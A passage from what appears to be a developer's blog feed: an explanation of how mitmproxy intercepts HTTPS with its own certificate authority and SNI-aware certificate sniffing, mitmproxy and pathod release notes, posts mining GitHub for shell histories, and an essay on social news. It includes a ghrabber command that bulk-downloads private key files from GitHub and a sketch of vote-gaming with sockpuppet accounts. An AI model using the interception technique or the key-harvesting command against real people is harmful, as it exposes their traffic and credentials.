working up to the most complicated interaction - transparent proxying of
SSL-protected traffic<sup class="footnote-reference"><a href="#ssl">1</a></sup> in the presence of
<a href="http://en.wikipedia.org/wiki/Server_Name_Indication">SNI</a>.</p>
<h2 id="explicit-http">Explicit HTTP</h2>
<p>Configuring the client to use mitmproxy as an explicit proxy is the simplest and
most reliable way to intercept traffic. The proxy protocol is codified in the
<a href="http://www.ietf.org/rfc/rfc2068.txt">HTTP RFC</a>, so the behaviour of both the
client and the server is well defined, and usually reliable. In the simplest
possible interaction with mitmproxy, a client connects directly to the proxy and
makes a request that looks like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">GET http://example.com/index.html HTTP/1.1
</span></code></pre>
<p>This is a proxy GET request - an extended form of the vanilla HTTP GET request
that includes a schema and host specification, and it includes all the
information mitmproxy needs to relay the request upstream.</p>
<div class="media">
<a href="explicit.png">
<img src="explicit.png" />
</a>
</div>
<table class="table">
<tbody>
<tr>
<td><b>1</b></td>
<td>The client connects to the proxy and makes a request.</td>
</tr>
<tr>
<td><b>2</b></td>
<td>Mitmproxy connects to the upstream server and simply forwards
the request on.</td>
</tr>
</tbody>
</table>
<h2 id="explicit-https">Explicit HTTPS</h2>
<p>The process for an explicitly proxied HTTPS connection is quite different. The
client connects to the proxy and makes a request that looks like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">CONNECT example.com:443 HTTP/1.1
</span></code></pre>
<p>A conventional proxy can neither view nor manipulate an SSL-encrypted data
stream, so a CONNECT request simply asks the proxy to open a pipe between the
client and server. The proxy here is just a facilitator - it blindly forwards
data in both directions without knowing anything about the contents. The
negotiation of the SSL connection happens over this pipe, and the subsequent
flow of requests and responses are completely opaque to the proxy.</p>
<h3 id="the-mitm-in-mitmproxy">The MITM in mitmproxy</h3>
<p>This is where mitmproxy's fundamental trick comes into play. The MITM in its
name stands for Man-In-The-Middle - a reference to the process we use to
intercept and interfere with these theoretically opaque data streams. The basic
idea is to pretend to be the server to the client, and pretend to be the client
to the server, while we sit in the middle decoding traffic from both sides. The
tricky part is that the <a href="http://en.wikipedia.org/wiki/Certificate_authority">Certificate
Authority</a> system is
designed to prevent exactly this attack, by allowing a trusted third-party to
cryptographically sign a server's SSL certificates to verify that they are
legit. If this signature doesn't match or is from a non-trusted party, a secure
client will simply drop the connection and refuse to proceed. Despite the many
shortcomings of the CA system as it exists today, this is usually fatal to
attempts to MITM an SSL connection for analysis. Our answer to this conundrum
is to become a trusted Certificate Authority ourselves. Mitmproxy includes a
full CA implementation that generates interception certificates on the fly. To
get the client to trust these certificates, we <a href="http://mitmproxy.org/doc/ssl.html">register mitmproxy as a trusted
CA with the device manually</a>.</p>
<h3 id="complication-1-what-s-the-remote-hostname">Complication 1: What's the remote hostname?</h3>
<p>To proceed with this plan, we need to know the domain name to use in the
interception certificate - the client will verify that the certificate is for
the domain it's connecting to, and abort if this is not the case. At first
blush, it seems that the CONNECT request above gives us all we need - in this
example, both of these values are "example.com". But what if the client had
initiated the connection as follows:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">CONNECT 10.1.1.1:443 HTTP/1.1
</span></code></pre>
<p>Using the IP address is perfectly legitimate because it gives us enough
information to initiate the pipe, even though it doesn't reveal the remote
hostname.</p>
<p>Mitmproxy has a cunning mechanism that smooths this over - <a href="http://mitmproxy.org/doc/features/upstreamcerts.html">upstream
certificate sniffing</a>. As
soon as we see the CONNECT request, we pause the client part of the
conversation, and initiate a simultaneous connection to the server. We complete
the SSL handshake with the server, and inspect the certificates it used. Now,
we use the Common Name in the upstream SSL certificates to generate the dummy
certificate for the client. Voila, we have the correct hostname to present to
the client, even if it was never specified.</p>
<h3 id="complication-2-subject-alternative-name">Complication 2: Subject Alternative Name</h3>
<p>Enter the next complication. Sometimes, the certificate Common Name is not, in
fact, the hostname that the client is connecting to. This is because of the
optional <a href="http://en.wikipedia.org/wiki/SubjectAltName">Subject Alternative
Name</a> field in the SSL certificate
that allows an arbitrary number of alternative domains to be specified. If the
expected domain matches any of these, the client will proceed, even though the
domain doesn't match the certificate Common Name. The answer here is simple:
when extract the CN from the upstream cert, we also extract the SANs, and add
them to the generated dummy certificate.</p>
<h3 id="complication-3-server-name-indication">Complication 3: Server Name Indication</h3>
<p>One of the big limitations of vanilla SSL is that each certificate requires its
own IP address. This means that you couldn't do virtual hosting where multiple
domains with independent certificates share the same IP address. In a world
with a rapidly shrinking IPv4 address pool this is a problem, and we have a
solution in the form of the <a href="http://en.wikipedia.org/wiki/Server_Name_Indication">Server Name
Indication</a> extension to
the SSL and TLS protocols. This lets the client specify the remote server name
at the start of the SSL handshake, which then lets the server select the right
certificate to complete the process.</p>
<p>SNI breaks our upstream certificate sniffing process, because when we connect
without using SNI, we get served a default certificate that may have nothing to
do with the certificate expected by the client. The solution is another tricky
complication to the client connection process. After the client connects, we
allow the SSL handshake to continue until just <em>after</em> the SNI value has been
passed to us. Now we can pause the conversation, and initiate an upstream
connection using the correct SNI value, which then serves us the correct
upstream certificate, from which we can extract the expected CN and SANs.</p>
<p>There's another wrinkle here. Due to a limitation of the SSL library mitmproxy
uses, we can't detect that a connection <em>hasn't</em> sent an SNI request until it's
too late for upstream certificate sniffing. In practice, we therefore make a
vanilla SSL connection upstream to sniff non-SNI certificates, and then discard
the connection if the client sends an SNI notification. If you're watching your
traffic with a packet sniffer, you'll see two connections to the server when an
SNI request is made, the first of which is immediately closed after the SSL
handshake. Luckily, this is almost never an issue in practice.</p>
<h3 id="putting-it-all-together">Putting it all together</h3>
<p>Lets put all of this together into the complete explicitly proxied HTTPS flow.</p>
<div class="media">
<a href="explicit_https.png">
<img src="explicit_https.png" />
</a>
</div>
<table class="table">
<tbody>
<tr>
<td><b>1</b></td>
<td>The client makes a connection to mitmproxy, and issues an HTTP
CONNECT request.</td>
</tr>
<tr>
<td><b>2</b></td>
<td>Mitmproxy responds with a 200 Connection Established, as if it
has set up the CONNECT pipe.</td>
</tr>
<tr>
<td><b>3</b></td>
<td>The client believes it's talking to the remote server, and
initiates the SSL connection. It uses SNI to indicate the hostname
it is connecting to.</td>
</tr>
<tr>
<td><b>4</b></td>
<td>Mitmproxy connects to the server, and establishes an SSL
connection using the SNI hostname indicated by the client.</td>
</tr>
<tr>
<td><b>5</b></td>
<td>The server responds with the matching SSL certificate, which
contains the CN and SAN values needed to generate the interception
certificate.</td>
</tr>
<tr>
<td><b>6</b></td>
<td>Mitmproxy generates the interception cert, and continues the
client SSL handshake paused in step 3.</td>
</tr>
<tr>
<td><b>7</b></td>
<td>The client sends the request over the established SSL
connection.</td>
</tr>
<tr>
<td><b>7</b></td>
<td>Mitmproxy passes the request on to the server over the SSL
connection initiated in step 4.</td>
</tr>
</tbody>
</table>
<h2 id="transparent-http">Transparent HTTP</h2>
<p>When a transparent proxy is used, the HTTP/S connection is redirected into a
proxy at the network layer, without any client configuration being required.
This makes transparent proxying ideal for those situations where you can't
change client behaviour - proxy-oblivious Android applications being a common
example.</p>
<p>To achieve this, we need to introduce two extra components. The first is a
redirection mechanism that transparently reroutes a TCP connection destined for
a server on the Internet to a listening proxy server. This usually takes the
form of a firewall on the same host as the proxy server -
<a href="http://www.netfilter.org/">iptables</a> on Linux or
<a href="http://en.wikipedia.org/wiki/PF_(firewall)">pf</a> on OSX. Once the client has
initiated the connection, it makes a vanilla HTTP request, which might look
something like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">GET /index.html HTTP/1.1
</span></code></pre>
<p>Note that this request differs from the explicit proxy variation, in that it
omits the scheme and hostname. How, then, do we know which upstream host to
forward the request to? The routing mechanism that has performed the
redirection keeps track of the original destination for us. Each routing
mechanism has a different way of exposing this data, so this introduces the
second component required for working transparent proxying: a host module that
knows how to retrieve the original destination address from the router. In
mitmproxy, this takes the form of a built-in set of
<a href="https://github.com/cortesi/mitmproxy/tree/master/libmproxy/platform">modules</a>
that know how to talk to each platform's redirection mechanism. Once we have
this information, the process is fairly straight-forward.</p>
<div class="media">
<a href="transparent.png">
<img src="transparent.png" />
</a>
</div>
<table class="table">
<tbody>
<tr>
<td><b>1</b></td>
<td>The client makes a connection to the server.</td>
</tr>
<tr>
<td><b>2</b></td>
<td>The router redirects the connection to mitmproxy, which is
typically listening on a local port of the same host. Mitmproxy
then consults the routing mechanism to establish what the original
destination was.</td>
</tr>
<tr>
<td><b>3</b></td>
<td>Now, we simply read the client's request...</td>
</tr>
<tr>
<td><b>4</b></td>
<td>... and forward it upstream.</td>
</tr>
</tbody>
</table>
<h2 id="transparent-https">Transparent HTTPS</h2>
<p>The first step is to determine whether we should treat an incoming connection
as HTTPS. The mechanism for doing this is simple - we use the routing mechanism
to find out what the original destination port is. By default, we treat all
traffic destined for ports 443 and 8443 as SSL.</p>
<p>From here, the process is a merger of the methods we've described for
transparently proxying HTTP, and explicitly proxying HTTPS. We use the routing
mechanism to establish the upstream server address, and then proceed as for
explicit HTTPS connections to establish the CN and SANs, and cope with SNI.</p>
<div class="media">
<a href="transparent_https.png">
<img src="transparent_https.png" />
</a>
</div>
<table class="table">
<tbody>
<tr>
<td><b>1</b></td>
<td>The client makes a connection to the server.</td>
</tr>
<tr>
<td><b>2</b></td>
<td>The router redirects the connection to mitmproxy, which is
typically listening on a local port of the same host. Mitmproxy
then consults the routing mechanism to establish what the original
destination was.</td>
</tr>
<tr>
<td><b>3</b></td>
<td>The client believes it's talking to the remote server, and
initiates the SSL connection. It uses SNI to indicate the hostname
it is connecting to.</td>
</tr>
<tr>
<td><b>4</b></td>
<td>Mitmproxy connects to the server, and establishes an SSL
connection using the SNI hostname indicated by the client.</td>
</tr>
<tr>
<td><b>5</b></td>
<td>The server responds with the matching SSL certificate, which
contains the CN and SAN values needed to generate the interception
certificate.</td>
</tr>
<tr>
<td><b>6</b></td>
<td>Mitmproxy generates the interception cert, and continues the
client SSL handshake paused in step 3.</td>
</tr>
<tr>
<td><b>7</b></td>
<td>The client sends the request over the established SSL
connection.</td>
</tr>
<tr>
<td><b>7</b></td>
<td>Mitmproxy passes the request on to the server over the SSL
connection initiated in step 4.</td>
</tr>
</tbody>
</table>
<div class="footnote-definition" id="ssl"><sup class="footnote-definition-label">1</sup>
<p>I use "SSL" to refer to both SSL and TLS in the generic sense, unless otherwise specified.</p>
</div>
pathod 0.9
2013-05-16T00:00:00+00:00
2013-05-16T00:00:00+00:00
https://corte.si/posts/code/pathod/announce0_9/
<p>I've just released <a href="http://pathod.net">pathod 0.9</a>, my toolset for crafting
malicious and interesting HTTP traffic. Apart from the usual range of stability
improvements and bugfixes, this release introduces a major new set of features:
proxy support. <a href="http://pathod.net/docs/pathoc">Pathoc</a>, the client, has sprouted
support for vanilla proxy connections, and is also able to tunnel through
proxies using CONNECT. <a href="http://pathod.net/docs/pathod">Pathod</a>, the server, will
now respond to proxy requests as well as straight HTTP, and will treat CONNECT
requests as SSL with on-the-fly generation of dummy certificates.</p>
<p>The Pathod changes in particular open a whole new range of possibilities for
fuzzing and other mischief. Any client with proxy support can be directed at
Pathod, which can then impersonate the upstream server and return the creatively
malicious response of your choice.</p>
<p>There have also been some organizational changes. This is the first release
based on <a href="http://github.com/cortesi/netlib">netlib</a>, the gonzo networking
library pathod now shares with <a href="http://mitmproxy.org">mitmproxy</a>. Over the next
while, pathod and mitmproxy will move closer together. As a sign of this, the
major version numbers between these projects are now synchronized.</p>
mitmproxy 0.9
2013-05-15T00:00:00+00:00
2013-05-15T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce0_9/
<div class="media">
<a href="mitmproxy_0_9.png">
<img src="mitmproxy_0_9.png" />
</a>
</div>
<p>I'm happy to announce the release of <a href="http://mitmproxy.org">mitmproxy 0.9</a>. This
is a major release, with huge improvements to mitmproxy pretty much across the
board. So much has happened in the year since the last release that it's
difficult to pick out the headlines. Mitmproxy is now faster, more scalable, and
works in more tricky corner cases than ever before. Full transparent mode
support has landed for both Linux and OSX. Content decoding is much nicer, with
a slew of new targets like
<a href="http://en.wikipedia.org/wiki/Action_Message_Format">AMF</a> and <a href="https://code.google.com/p/protobuf/">Protocol
Buffers</a>. We now have a WSGI container that
allows you to host web apps right in the proxy. In addition to this, there is a
myriad of new features, bugfixes and other small improvements.</p>
<p>There are also changes afoot in the project itself. As a first step, I've moved
mitmproxy from the GPLv3 to an MIT license. I hope that this will make it easier
for people to use the project in more contexts. Keep an eye out for more changes
along these lines soon, geared to broadening participation in the project.</p>
<h2 id="changelog">Changelog</h2>
<ul>
<li>Upstream certs mode is now the default.</li>
<li>Add a WSGI container that lets you host in-proxy web applications.</li>
<li>Full transparent proxy support for Linux and OSX.</li>
<li>Introduce netlib, a common codebase for <a href="http://github.com/cortesi/netlib">mitmproxy and
pathod</a>.</li>
<li>Full support for SNI.</li>
<li>Color palettes for mitmproxy, tailored for light and dark terminal
backgrounds.</li>
<li>Stream flows to file as responses arrive with the "W" shortcut in
mitmproxy.</li>
<li>Extend the filter language, including ~d domain match operator, ~a to
match asset flows (js, images, css).</li>
<li>Follow mode in mitmproxy ("F" shortcut) to "tail" flows as they arrive.</li>
<li>--dummy-certs option to specify and preserve the dummy certificate
directory.</li>
<li>Server replay from the current captured buffer.</li>
<li>Huge improvements in content views. We now have viewers for AMF, HTML,
JSON, Javascript, images, XML, URL-encoded forms, as well as hexadecimal
and raw views.</li>
<li>Add Set Headers, analogous to replacement hooks. Defines headers that are set
on flows, based on a matching pattern.</li>
<li>A graphical editor for path components in mitmproxy.</li>
<li>A small set of standard user-agent strings, which can be used easily in
the header editor.</li>
<li>Proxy authentication to limit access to mitmproxy</li>
</ul>
Google, destroyer of ecosystems
2013-03-14T00:00:00+00:00
2013-03-14T00:00:00+00:00
https://corte.si/posts/socialmedia/rip-google-reader/
<p>Google has finally shut down a service I actually care about - <a href="http://googlereader.blogspot.co.nz/2013/03/powering-down-google-reader.html">Google Reader
will die a graceless, undignified death on July 1,
2013</a>.
The only way Google could inconvenience me more would be to shut down search
itself, and yet - I'm not angry that Google is shutting Reader down. I'm furious
that they ever entered the RSS game at all. Consider this quote from a
TechCrunch <a href="http://techcrunch.com/2006/01/10/searchfox-to-shut-down/">article in January
2006</a>. Here, Michael
Arrington ends an article about the shutdown of a feed reader service with a
statement that seems truly bizarre today:</p>
<blockquote>
<p>The RSS reader space is becoming hyper competitive, with dozens of different
choices for readers.</p>
</blockquote>
<p>A hyper competitive space with dozens of choices? Reader made its first public
appearance a couple of months before this, in October 2005. I remember this
period well - it was a time of immense excitement, when RSS seemed to be the
future, the news ecosystem was vibrant, and this thing called the blogosphere,
fueled by peer subscription, was doubling in size every six months. It was into
this magic garden that Google wandered, like a giant toddler leaving destruction
in its wake. Reader was undeniably a good product, but it's best quality was
also its worst: it was free. Subsidized by Google's immense search profits, it
never had to earn its keep, and its competitors started to die. Over time, the
"hyper competitive" RSS reader market turned into a monoculture. Today, on the
eve of its shutdown, RSS more or less means "Google Reader" to a large fraction
of readers, to the extent where even the best feed readers on IOS are just
Google Reader clients<sup class="footnote-reference"><a href="#1">1</a></sup>.</p>
<p>The sudden shock of Reader's closure will harm a news ecosystem that I <a href="https://corte.si/posts/socialmedia/trouble-with-social-news/">already
believe to be deeply ill</a>.
Google Reader is not just a core part of my information diet - it's also the
most direct channel I have to readers of this blog. As of today, the Reader
subscriber count for <a href="http://corte.si">corte.si</a> stands at about 3 times the
total number of other subscribers combined. Some of these readers will migrate
to other services and stay in touch, but many will inevitably abandon the idea
of direct subscription to blogs entirely. In the next few months, tens of
thousands of small blogs will lose direct contact with a large fraction of their
readers.</p>
<p>The truth is this: Google destroyed the RSS feed reader ecosystem with a
subsidized product, stifling its competitors and killing innovation. It then
neglected Google Reader itself for years, after it had effectively become the
only player. Today it does further damage by buggering up the already
beleaguered links between publishers and readers. It would have been better for
the Internet if Reader had never been at all.</p>
<div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup>
<p>Yes, I'm aware that there are a few hardy outliers still playing in this
place. My own logs show that their reach is insignificant, though, and when I
tried to shift my subscriptions about a year ago, there was nothing as good as
Reader itself. Once <a href="http://www.newsblur.com">NewsBlur's</a> servers have
recovered, I definitely plan to give it another shot.</p>
</div>
Things I found on GitHub: aspell custom dictionary entries
2013-02-26T00:00:00+00:00
2013-02-26T00:00:00+00:00
https://corte.si/posts/hacks/github-spellingdicts/
<p>I've been doing a series of posts looking at data gathered with
<a href="https://github.com/cortesi/ghrabber">ghrabber</a>, a simple tool I wrote that lets
you grab files matching a search specification from GitHub. Last week, I looked
at <a href="https://corte.si/posts/hacks/github-shhistory/">shell history</a> in the broad, and
then specifically at <a href="https://corte.si/posts/hacks/github-pipechains/">pipe chains</a>.
Today, I move on to something different - custom <a href="http://aspell.net/">aspell</a>
dictionaries. When aspell finds a word it doesn't recognize, the user is
prompted to correct it, ignore it, or add it to a custom dictionary so that it
will be recognized as correct in future. These words are written to the user's
custom dictionary - a file named <strong>.aspell_en_pw</strong> that lives in the user's
home directory. It turns out that 30 people have checked aspell dictionaries
into GitHub, containing a total of 9501 custom words. The chart below shows the
top 50 words, with the X-axis showing the percentage of files the word appeared
in.</p>
<div class="media">
<a href="aspell.png">
<img src="aspell.png" />
</a>
</div>
<p>There were a few requests for the raw data behind the previous two posts, so
this time round you can also <a href="./aspell-all.csv">download a CSV file</a>
with the occurrence totals for each word in the dataset.</p>
Things I found on GitHub: pipe chains
2013-02-22T00:00:00+00:00
2013-02-22T00:00:00+00:00
https://corte.si/posts/hacks/github-pipechains/
<p>Earlier this week I published <a href="https://github.com/cortesi/ghrabber">ghrabber</a>, a
simple tool that lets you grab files matching an arbitrary search specification
from GitHub. I used ghrabber to retrieve all the bash_history and zsh_history
files accidentally checked in to repos, and took <a href="http://corte.si/posts/hacks/github-shhistory/index.html">a light look at the dataset
with some simple
graphs</a>. In total, I
obtained 234 shell history files with 165k individual command entries. This is a
very rare opportunity to "shoulder-surf", to actually see what people <em>do</em> at
the command prompt, and perhaps get some insights into how to improve things.</p>
<p>Along those lines, today's post looks at pipe chains - that is, compound
commands that pipe the output of one command to another. The pipe operator lies
at the core of the Unix command-line philosophy. The fact that we can easily
compose complex operations is the reason why we are able to write small tools
that "do one thing well" without losing generality. The shell history data on
Github can give us some real data about what people do with composed commands,
and how they do it.</p>
<div class="media">
<a href="pipechains.png">
<img src="pipechains.png" />
</a>
</div>
<p>It turns out that about 2% of all commands issued on the command-line use
pipes. The graph above shows the prevalence the most common pipe chains - that
is, what percentage of the user in my sample used each chain. There's a lot of
fascinating stuff we can read straight from this image.</p>
<p>Starting at the top, the first thing we notice is how widely used the <strong>ps |
grep</strong> chain is. About 17% of users in my sample used this chain - given the
type of data we have, the real-world prevalence would surely be higher still.
I've just been extolling the virtues of small tools and composability, but in
this case practicality should beat purity. I suggest that everyone should have
a command-alias similar to this in their shell configuration:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#96b5b4;">alias </span><span style="color:#8fa1b3;">pg</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">ps aux | grep</span><span style="color:#c0c5ce;">"
</span></code></pre>
<p>I've added this to my .zshrc today, and I've already used it twice.</p>
<p>Next up, we have the <strong>ls | grep</strong> pipes. The vast majority of uses here could
actually be accomplished using the shell's filename generation mechanism. This
ranges from simple redundancies like grepping for file extensions, to
performing quite complex matching operations that could be done using the
shell's advanced glob operations. I'm guilty of this myself - I rarely use
features like recursive globbing, expansions using character ranges, case
insensitive globbing, and so forth. I've brushed up on <a href="http://linux.die.net/man/1/zshexpn">filename expansion for
my chosen shell</a>, and perhaps you should
too.</p>
<p>The last thing I want to point out is a pattern that's genuinely dangerous -
<strong>curl | bash</strong>, along with its cousins <strong>curl | sh</strong> and <strong>wget | sh</strong>.
Unfortunately, this has become the recommended installation pattern for some
tool - the vast majority of invocations here are for <a href="https://rvm.io/">RVM</a> and
<a href="http://yeoman.io/">Yeoman</a>. I don't think it's a good idea to pipe anything
from the web straight into a local shell, but the situation is made
particularly dire by the fact that almost half of these invocations are either
over plain HTTP or explicitly turn certificate validation off.</p>
<p>I'll stop here, although there are interesting things to say about nearly every
entry in the graph above. Next week, I'll move on from the shell history
sample, look at some other juicy datasets extracted using ghrabber.</p>
Things I found on GitHub: shell history
2013-02-19T00:00:00+00:00
2013-02-19T00:00:00+00:00
https://corte.si/posts/hacks/github-shhistory/
<p>Github recently introduced hugely <a href="https://github.com/blog/1381-a-whole-new-code-search">improved code
search</a>, one of those rare
moments when a service I use adds a feature that directly and measurably
measurably improves my life. Predictably, there was soon a
<a href="http://www.webmonkey.com/2013/01/users-scramble-as-github-search-exposes-passwords-security-details/">flurry</a>
<a href="http://www.scmagazine.com.au/News/330152,passwords-ssh-keys-exposed-on-github.aspx">of</a>
<a href="http://arstechnica.com/security/2013/01/psa-dont-upload-your-important-passwords-to-github/">breathless</a>
stories about the security implications. This shouldn't have been news to anyone - by now, it should be clear that better search in almost any context has
security or privacy implications, a law of the universe almost as solid as the
second law of thermodynamics. We saw this with <a href="http://www.securityfocus.com/news/11417">Google's own code
search</a>, as well as <a href="http://en.wikipedia.org/wiki/Google_hacking">Google
proper</a>, Facebook's <a href="http://actualfacebookgraphsearches.tumblr.com/">Graph
Search</a> and even
<a href="http://www.wired.com/wiredenterprise/2013/02/microsoft-bing-fights-botnets/">Bing</a>.
A certain fraction of people will always make mistakes, and and any sufficiently
powerful search will allow bad guys to find and take advantage of the outliers.</p>
<p>After the dust had settled a bit I started wondering what else we could do with
Github's search - other than snookering schmucks who checked in their private
keys. I'm always enticed by data, and the combination of search and the ability
to download raw checked-in files seemed like a promising avenue to explore. Lets
see what we can come up with.</p>
<h2 id="ghrabber-grab-files-from-github"><a href="https://github.com/cortesi/ghrabber">ghrabber</a> - grab files from GitHub</h2>
<p>First, some tooling. I've just released ghrabber, a simple tool that lets you
grab all files matching a search specification from GitHub. Here, for instance,
is an obvious wheeze - fetching all files with the extension ".key":</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">./ghrabber.py </span><span style="color:#c0c5ce;">"</span><span style="color:#a3be8c;">extension:key</span><span style="color:#c0c5ce;">"
</span></code></pre>
<p>Downloaded files are saved locally to files named <strong>user.repository</strong>. Existing
files with the same name are skipped, which means that you can reasonably
efficiently stop and resume a ghrab.</p>
<h2 id="shell-history-files">Shell history files</h2>
<p>I've been having a lot of fun exploring Github with ghrabber. I'll return to
this in future posts - today I'll start with a quick illustration of what can
be done. One type of difficult-to-find information that is sometimes checked in
to repos is shell history. Two simple ghrabber commands for the two most
popular shells is all we need:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">./ghrabber.py </span><span style="color:#c0c5ce;">"</span><span style="color:#a3be8c;">path:.bash_history</span><span style="color:#c0c5ce;">"
</span></code></pre>
<p>and</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">./ghrabber.py </span><span style="color:#c0c5ce;">"</span><span style="color:#a3be8c;">path:.zsh_history</span><span style="color:#c0c5ce;">"
</span></code></pre>
<p>After cleaning the data a bit, I had 234 history files varying in length from 1
line to just over 10 thousand, containing a total of 165k entries. I fed this
into <a href="http://pandas.pydata.org/">Pandas</a> for analysis, parsing each command
using a combination of hand-hacked heuristics and the built-in
<a href="http://docs.python.org/2/library/shlex.html">shlex</a> module. The remainder of
this post is a light exploration of some approaches to this dataset, steering
clear of the obvious and tediously well-covered security implications.</p>
<div class="media">
<a href="topcmds.png">
<img src="topcmds.png" />
</a>
</div>
<p>One way to slice the data is to look at the percentage of history files a given
command appears in. This gives us a nice listing of the top commands by user
prevalence, which you can see in the graph on the left above. On the right, I've
taken the same list of commands, and checked how many invocations are preceded
by a <strong>man</strong> lookup for the command. This gives us an idea of which
commonly-used commands have difficult or unintuitive interfaces. It's
interesting that <strong>ln</strong> is right at the top of the list, considering how simple
the command syntax is. My theory is that everyone forgets the order of the
source and target files.</p>
<div class="media">
<a href="editors.png">
<img src="editors.png" />
</a>
</div>
<div class="media">
<a href="tmuxes.png">
<img src="tmuxes.png" />
</a>
</div>
<p>Since we have a list of the most widely used commands, it's also trivial to do
silly popularity comparisons. Above is the obvious look at the state of the
editor wars (vim is winning, folks), and a check on how
<a href="http://tmux.sourceforge.net/">tmux</a> is doing in supplanting screen (the faster
the better).</p>
<div class="media">
<a href="args-ssh.png">
<img src="args-ssh.png" />
</a>
</div>
<div class="media">
<a href="args-mkdir.png">
<img src="args-mkdir.png" />
</a>
</div>
<div class="media">
<a href="args-rm.png">
<img src="args-rm.png" />
</a>
</div>
<div class="media">
<a href="args-ls.png">
<img src="args-ls.png" />
</a>
</div>
<p>Another interesting thing to do is to look at the most commonly used flags to
commands. I think having "real data" of command use may well guide us to design
better command-line interfaces. I'd love to know the most common invocation
flags for some of the tools I write.</p>
<p>I'll stop there. The data pool in this case is very deep, and there are a huge
range of interesting bits of command-line ethnography that could be done. Stay
posted for more in the coming weeks.</p>
The trouble with social news
2013-01-24T00:00:00+00:00
2013-01-24T00:00:00+00:00
https://corte.si/posts/socialmedia/trouble-with-social-news/
<p>There is something terribly awry with the social news ecosystem. This is a
feeling that's been growing on me over the last few years, and is the reason why
I've cut both <a href="http://reddit.com">Reddit</a> and <a href="http://news.ycombinator.com">Hacker
News</a> (who together constitute pretty much all of
"social news") out of my information diet. Although I've mulled over things in
various conversations, I've never actually tried to put my feeling of unease in
writing, until today. What's spurring me into action is a <a href="http://yann.lecun.com/ex/pamphlets/publishing-models.html">proposal by Yann
LeCun</a> that a model
similar to social news be adopted for scientific peer review - self-assembled
Reviewing Entities voting on streams of submitted papers, regulated by a
reputation system for authors and reviewers. Basically, this is science a la
Reddit: complete with subreddits, karma and upboats. I find the idea frankly
terrifying.</p>
<p>I guess it's time, then, to put finger to keyboard and lay out what disquiets
me about social news.</p>
<h2 id="karma-corrupts">Karma Corrupts</h2>
<p>You start by introducing a reputation mechanism like
<a href="http://www.reddit.com/wiki/faq#toc_9">karma</a> to improve some outcome - say, to
increase the quality of comments, or to apply a threshold to restrict voting to
trustworthy community members. This seems like a plausible and even elegant
mechanism at first, until you discover the terrible side-effects.</p>
<p>Humans are fundamentally status-seeking social apes, and you've now introduced
a visible measure of social worth that people will be driven to maximize. In
the real world, we have a word for those who spend their lives accumulating
karma - we call them politicians. And so, within karma communities, we see the
rise of a political class - persuasive centrists who cater (perhaps
unconsciously) to a constituency, and who express (perhaps eloquently) opinions
calculated to appeal to the masses and avoid controversy. Hacker News and many
subreddits are dominated by people like this, whose comments are largely
predictable and rarely add anything new or unexpected to the conversation.</p>
<p>At the bottom end of the food chain, we have a different class of creature with
the same basic aim as the politicians, but without the persuasive charm needed
to pull off the political approach. These are the karma whores, who use a
mixture of frank pandering, provocation and calculated outrage to achieve the
same aims.</p>
<p>The karma maximization game often acts contrary to the goals we aimed to
achieve by introducing karma in the first place: the tenor of the community
suffers, the diversity of opinion declines, and the karma whores post pictures
of their cats everywhere.</p>
<h2 id="the-lossy-sieve">The Lossy Sieve</h2>
<p>Go and have a look at the <a href="http://news.ycombinator.com/newest">new story submission
queue</a> on Hacker News. Scroll through a few
pages, and pay attention to the stories stuck at one vote - they will most
likely never receive another upvote and will die in obscurity. Now, go look at
the <a href="http://news.ycombinator.com/">front page</a>. When I do this exercise I'm
struck by the fact that there's plenty of crap on the front page, and quite a
bit of good stuff in the submission queue languishing in obscurity. So, quality
can't be the sole metric here - what determines what gets onto the front page
and what doesn't?</p>
<p>Lets try a thought experiment. First, set up a small number of voting accounts - say,
10 or so. Now, in the new submission queue, pick 5 random stories every
hour, and give them a small number of upvotes soon after they are submitted. I
predict that you will find that stories that received this small initial boost
are vastly more likely to end up on the front page. If I'm right, then chance
dominates story selection - as long as an article exceeds some basic quality
threshold, it all depends on who happens to see the story soon after it is
submitted, and whether the spirit moves them to vote. Note that this is not the
case at the extremes - frankly bad content won't be upvoted, and really
important stories will usually find their way to the top. The lossy sieve
phenomenon affects everything in between.</p>
<p>What this boils down to is that social news doesn't provide an effective filter - good
content gets lost, and mediocre content finds its way onto our screens.</p>
<h2 id="the-pinhole-effect">The Pinhole Effect</h2>
<p>In social news, the front page is king. Most users never go beyond the first or
second page of top stories. However, front-page real estate is incredibly
limited compared to the volume of submissions on most popular subreddits and on
Hacker News. The effect of this is that we're looking at a fast-flowing river
of information through a pinhole. Even assuming that the selection mechanism
works flawlessly, what you see on the front page is a small sliver of the
total, chosen through a consensus mechanism that takes no account of individual
variation in tastes and interests. The news you see is not tailored to <em>you</em> -
it's tailored to some abstract, average participant, with all the rough edges
of individuality smoothed away. The effect of this is that even at its best,
the stories that emerge from the social news system feel like a predictable
pablum dished up by the hivemind. The subreddit system tries to improve this by
allowing communities to self-assemble around interests, but the pinhole effect
still dominates in busy subreddits like
<a href="http://reddit.com/r/programming">/r/programming</a>.</p>
<h2 id="gaming-the-system">Gaming The System</h2>
<p>Social news systems are eminently gameable, and cheating is rife. Part of the
reason for this is that a story's destiny depends on a relatively small number
of votes. If your story has any merit at all, you significantly increase the
likelihood that it will end up on the front page by giving it a small nudge at
the beginning of its life. If it has no merit whatsoever, you can still force
it onto people's screens with a few tens or hundreds of votes. Conversely, you
can use the same effect to censor and oppress views you disagree with if your
social news site has downvotes. Anyone who's kept an eye on these things can
rattle off examples of gaming in action: the <a href="http://en.wikipedia.org/wiki/Digg_Patriots">voting
rings</a>, the <a href="http://www.reddit.com/r/reddit.com/comments/b7e25/today_i_learned_that_one_of_reddits_most_active/">"social media
consultants"</a>,
the <a href="http://www.reddit.com/r/shitredditsays">vigilante thought-polizei</a>,
the <a href="http://www.reddit.com/comments/2n2tu/ron_paul_on_the_debate_my_opponents_called_for/c2n5v8">political
operators</a>,
and dozens of other types of manipulation and villainy. What's more - these
